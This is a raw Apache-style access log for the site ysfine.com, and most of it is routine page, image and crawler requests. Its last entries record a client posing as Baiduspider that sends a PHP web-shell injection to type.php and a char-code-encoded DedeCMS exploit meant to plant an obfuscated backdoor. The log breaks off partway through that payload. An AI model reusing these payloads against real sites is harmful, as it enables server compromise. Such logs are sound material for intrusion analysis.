196.51.4.96 - - [16/Feb/2023:05:12:19 -0800] "GET /einstein/index.html HTTP/1.1" 200 135 "https://ysfine.com/einstein/ulm.html" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:102.0) Gecko/20100101 Firefox/102.0" "ysfine.com"
52.167.144.62 - - [16/Feb/2023:05:12:23 -0800] "GET /friends/italia.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
64.124.8.57 - - [16/Feb/2023:05:12:29 -0800] "GET /world/germany/hegel08.jpg HTTP/1.1" 200 86429 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
64.124.8.56 - - [16/Feb/2023:05:12:42 -0800] "GET /princeton/nasshall06.jpg HTTP/1.1" 200 145090 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
64.124.8.57 - - [16/Feb/2023:05:13:02 -0800] "GET /world/france/nice101.jpg HTTP/1.1" 200 62215 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
64.124.8.52 - - [16/Feb/2023:05:13:04 -0800] "GET /ffriends/omsk11.jpg HTTP/1.1" 200 85214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
185.191.171.38 - - [16/Feb/2023:05:13:31 -0800] "GET /maga/weyl.html HTTP/1.1" 200 4239 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.ysfine.com"
17.241.219.184 - - [16/Feb/2023:05:13:46 -0800] "GET /people/sbt.html HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:13:47 -0800] "GET /kobak/sorae/somap38.jpg HTTP/1.1" 200 109622 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
123.111.60.230 - - [16/Feb/2023:05:13:50 -0800] "GET /jobs/koreaj.html HTTP/1.1" 200 5358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "ysfine.com"
123.111.60.230 - - [16/Feb/2023:05:13:51 -0800] "GET /apple-touch-icon-152x152-precomposed.png HTTP/1.1" 404 88 "-" "MobileSafari/8614.2.9.0.10 CFNetwork/1399 Darwin/22.1.0" "ysfine.com"
123.111.60.230 - - [16/Feb/2023:05:13:52 -0800] "GET /apple-touch-icon-152x152.png HTTP/1.1" 404 88 "-" "MobileSafari/8614.2.9.0.10 CFNetwork/1399 Darwin/22.1.0" "ysfine.com"
123.111.60.230 - - [16/Feb/2023:05:13:52 -0800] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 88 "-" "MobileSafari/8614.2.9.0.10 CFNetwork/1399 Darwin/22.1.0" "ysfine.com"
123.111.60.230 - - [16/Feb/2023:05:13:52 -0800] "GET /apple-touch-icon.png HTTP/1.1" 404 88 "-" "MobileSafari/8614.2.9.0.10 CFNetwork/1399 Darwin/22.1.0" "ysfine.com"
52.167.144.35 - - [16/Feb/2023:05:14:18 -0800] "GET /world/germany/vienna07.jpg HTTP/1.1" 200 96133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:14:37 -0800] "GET /newyork/radioci03.jpg HTTP/1.1" 200 149263 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:14:43 -0800] "GET /newyork/rocke07.jpg HTTP/1.1" 200 127552 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
52.167.144.35 - - [16/Feb/2023:05:15:20 -0800] "GET /bio/sbk/1950.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
52.167.144.62 - - [16/Feb/2023:05:15:24 -0800] "GET /bio/style/proschanie.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:15:26 -0800] "GET /style/durbin.jpg HTTP/1.1" 200 16279 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
95.163.255.101 - - [16/Feb/2023:05:15:48 -0800] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Img/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:15:57 -0800] "GET /style/hamako11.jpg HTTP/1.1" 200 187536 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
95.163.255.71 - - [16/Feb/2023:05:15:59 -0800] "GET /maga/phil/marxphil55a.jpg HTTP/1.1" 200 95538 "http://go.mail.ru/search_images" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Img/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:16:05 -0800] "GET /ysbio/world/brit/cam36.jpg HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.52 - - [16/Feb/2023:05:16:06 -0800] "GET /style/musee/britmu09.jpg HTTP/1.1" 200 125141 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
52.167.144.35 - - [16/Feb/2023:05:16:29 -0800] "GET /bio/style/artlove.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:16:46 -0800] "GET /wdc/vietwar22.jpg HTTP/1.1" 200 115208 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
216.48.133.19 - - [16/Feb/2023:05:16:47 -0800] "GET /world/france/notre01.jpg HTTP/1.1" 200 229864 "https://www.google.com/" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.52 - - [16/Feb/2023:05:16:47 -0800] "GET /world/germany/tub15.jpg HTTP/1.1" 200 101927 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.52 - - [16/Feb/2023:05:17:11 -0800] "GET /style/music/liszt04.jpg HTTP/1.1" 200 168754 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
52.167.144.35 - - [16/Feb/2023:05:17:19 -0800] "GET /einstein/evol.html HTTP/1.1" 200 3830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:17:37 -0800] "GET /wigner/wig39f.jpg HTTP/1.1" 200 98142 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
64.124.8.56 - - [16/Feb/2023:05:17:48 -0800] "GET /wdc/oas11.jpg HTTP/1.1" 200 81059 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/wigsis.html HTTP/1.1" 200 10275 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirac63b.jpg HTTP/1.1" 200 41617 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/wigsis22.jpg HTTP/1.1" 200 39975 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirwig33b.jpg HTTP/1.1" 200 11663 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/michaels22.jpg HTTP/1.1" 200 47473 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /princeton/annex11b.jpg HTTP/1.1" 200 39639 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirac84b.jpg HTTP/1.1" 200 42763 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/hazi22.jpg HTTP/1.1" 200 37344 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /feynman/feydirac270.jpg HTTP/1.1" 200 59000 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /world/poland/jablo08b.jpg HTTP/1.1" 200 42070 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /world/poland/jablo01b.jpg HTTP/1.1" 200 39801 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/jablo62b.jpg HTTP/1.1" 200 42817 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/hyperell2.jpg HTTP/1.1" 200 29858 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /kobak/nicodem11b.jpg HTTP/1.1" 200 79065 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirackim6201.jpg HTTP/1.1" 200 51283 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /world/poland/jablo19b.jpg HTTP/1.1" 200 49913 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirackn33b.jpg HTTP/1.1" 200 48200 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /eink/eink61c.jpg HTTP/1.1" 200 34119 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /dirac/dirackim6202.jpg HTTP/1.1" 200 51465 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:50 -0800] "GET /world/poland/jablo20b.jpg HTTP/1.1" 200 41339 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
5.77.88.59 - - [16/Feb/2023:05:17:53 -0800] "GET /favicon.ico HTTP/1.1" 404 88 "https://ysfine.com/dirac/wigsis.html" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36" "ysfine.com"
34.226.141.85 - - [16/Feb/2023:05:17:56 -0800] "GET /ads.txt HTTP/1.1" 404 88 "-" "AdsTxtCrawler/1.0.2" "ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:18:15 -0800] "GET /world/france/sorbonne26.jpg HTTP/1.1" 200 100773 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
64.124.8.55 - - [16/Feb/2023:05:18:19 -0800] "GET /ysbio/world/france/magots07.jpg HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
36.90.8.106 - - [16/Feb/2023:05:18:19 -0800] "GET /kowar/tanks.html HTTP/1.1" 200 8699 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" "ysfine.com"
52.167.144.86 - - [16/Feb/2023:05:18:39 -0800] "GET /sbk/2008waw11.jpg HTTP/1.1" 200 211182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
87.250.224.237 - - [16/Feb/2023:05:18:53 -0800] "GET /articles/yukadirac80.pdf HTTP/1.1" 401 90 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:19:21 -0800] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:19:21 -0800] "GET /class54/class5470/total_data/sub_343.htm HTTP/1.1" 200 3310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
64.124.8.56 - - [16/Feb/2023:05:19:44 -0800] "GET /world/russ/kiev028.jpg HTTP/1.1" 200 116599 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.55 - - [16/Feb/2023:05:19:51 -0800] "GET /ysbio/princeton/withers01.jpg HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.52 - - [16/Feb/2023:05:20:00 -0800] "GET /sbk/2001balto11.jpg HTTP/1.1" 200 143967 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
52.167.144.62 - - [16/Feb/2023:05:20:02 -0800] "GET /wisdom/yksgrave2.jpg HTTP/1.1" 200 41493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:20:20 -0800] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:20:20 -0800] "GET /eink/eink61 HTTP/1.1" 200 114049 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
52.167.144.86 - - [16/Feb/2023:05:20:29 -0800] "GET /bio/wigner/e(2).html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:20:36 -0800] "GET /kowar/war51bot.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
64.124.8.50 - - [16/Feb/2023:05:21:02 -0800] "GET /maga/keigel22.html HTTP/1.1" 200 4929 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "ysfine.com"
200.173.187.176 - - [16/Feb/2023:05:21:02 -0800] "GET /wigner/neum/vnc01.jpg HTTP/1.1" 200 133641 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "ysfine.com"
64.124.8.57 - - [16/Feb/2023:05:21:16 -0800] "GET /princeton/ysturner.jpg HTTP/1.1" 200 176356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
52.167.144.86 - - [16/Feb/2023:05:21:28 -0800] "GET /bio/princeton/campus.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "ysfine.com"
185.191.171.18 - - [16/Feb/2023:05:22:03 -0800] "GET /home/kowis33.html HTTP/1.1" 200 2104 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.ysfine.com"
64.124.8.54 - - [16/Feb/2023:05:22:13 -0800] "GET /world/brit/cam22.jpg HTTP/1.1" 200 172995 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
185.191.171.14 - - [16/Feb/2023:05:22:23 -0800] "GET /wisdom/quovadis.html HTTP/1.1" 200 3582 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "ysfine.com"
64.124.8.49 - - [16/Feb/2023:05:22:30 -0800] "GET /wigner/wigein.jpg HTTP/1.1" 200 152965 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
64.124.8.49 - - [16/Feb/2023:05:22:31 -0800] "GET /world/germany/leipzig24.jpg HTTP/1.1" 200 202107 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
64.124.8.53 - - [16/Feb/2023:05:22:48 -0800] "GET /world/china/dalian04.jpg HTTP/1.1" 200 110424 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.55 - - [16/Feb/2023:05:23:25 -0800] "GET /world/latina/sambario14.jpg HTTP/1.1" 200 72783 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.28 - - [16/Feb/2023:05:23:31 -0800] "GET /ysbio/world/baltic/kalin03.jpg HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.57 - - [16/Feb/2023:05:23:58 -0800] "GET /world/germany/stutt09.jpg HTTP/1.1" 200 86566 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "ysfine.com"
64.124.8.54 - - [16/Feb/2023:05:23:59 -0800] "GET /einstein/places/ulm26.jpg HTTP/1.1" 200 104983 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:24:02 -0800] "GET /class54/pics/g112.jpg HTTP/1.1" 200 91531 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
64.124.8.57 - - [16/Feb/2023:05:24:38 -0800] "GET /usca/pitt/machinery22.jpg HTTP/1.1" 200 140879 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" "www.ysfine.com"
216.244.66.229 - - [16/Feb/2023:05:24:42 -0800] "GET /confer/confmenu.html HTTP/1.1" 200 161 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "ysfine.com"
107.189.31.198 - - [16/Feb/2023:05:24:48 -0800] "HEAD / HTTP/1.1" 200 - "https://www.ysfine.com/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "www.ysfine.com"
107.189.31.198 - - [16/Feb/2023:05:24:49 -0800] "GET /type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss HTTP/1.1" 404 73 "https://www.ysfine.com//type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "www.ysfine.com"
107.189.31.198 - - [16/Feb/2023:05:24:49 -0800] "GET /index.php HTTP/1.1" 404 88 "https://www.ysfine.com//index.php" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "www.ysfine.com"
107.189.31.198 - - [16/Feb/2023:05:24:49 -0800] "GET /plus/erraddsave.php?dopost=saveedit&a=b&arrs1[]=99&c=d&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=56&arrs2[]=56&arrs2[]=56&arrs2[]=56&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=105&arrs2[]=102&arrs2[]=40&arrs2[]=105&arrs2[]=115&arrs2[]=115&arrs2[]=101&arrs2[]=116&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=108&arrs2[]=101&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=41&arrs2[]=41&arrs2[]=123&arrs2[]=36&arrs2[]=97&arrs2[]=61&arrs2[]=115&arrs2[]=116&arrs2[]=114&arrs2[]=114&arrs2[]=101&arrs2[]=118&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=99&arrs2[]=97&arrs2[]=108&arrs2[]=112&arrs2[]=101&arrs2[]=114&arrs2[]=95&arrs2[]=103&arrs2[]=101&arrs2[]=114&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=36&arrs2[]=98&arrs2[]=61&arrs2[]=115&arrs2[]=116&arrs2[]=114&arrs2[]=114&arrs2[]=101&arrs2[]=118&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=100&arrs2[]=111&arrs2[]=99&arrs2[]=101&arrs2[]=100&arrs2[]=95&arrs2[]=52&arrs2[]=54&arrs2[]=101&arrs2[]=115&arrs2[]=97&arrs2[]=98&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=36&arrs2[]=97&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=94&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=98&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=90&arrs2[]=88&arrs2[]=90&arrs2[]=104&arrs2[]=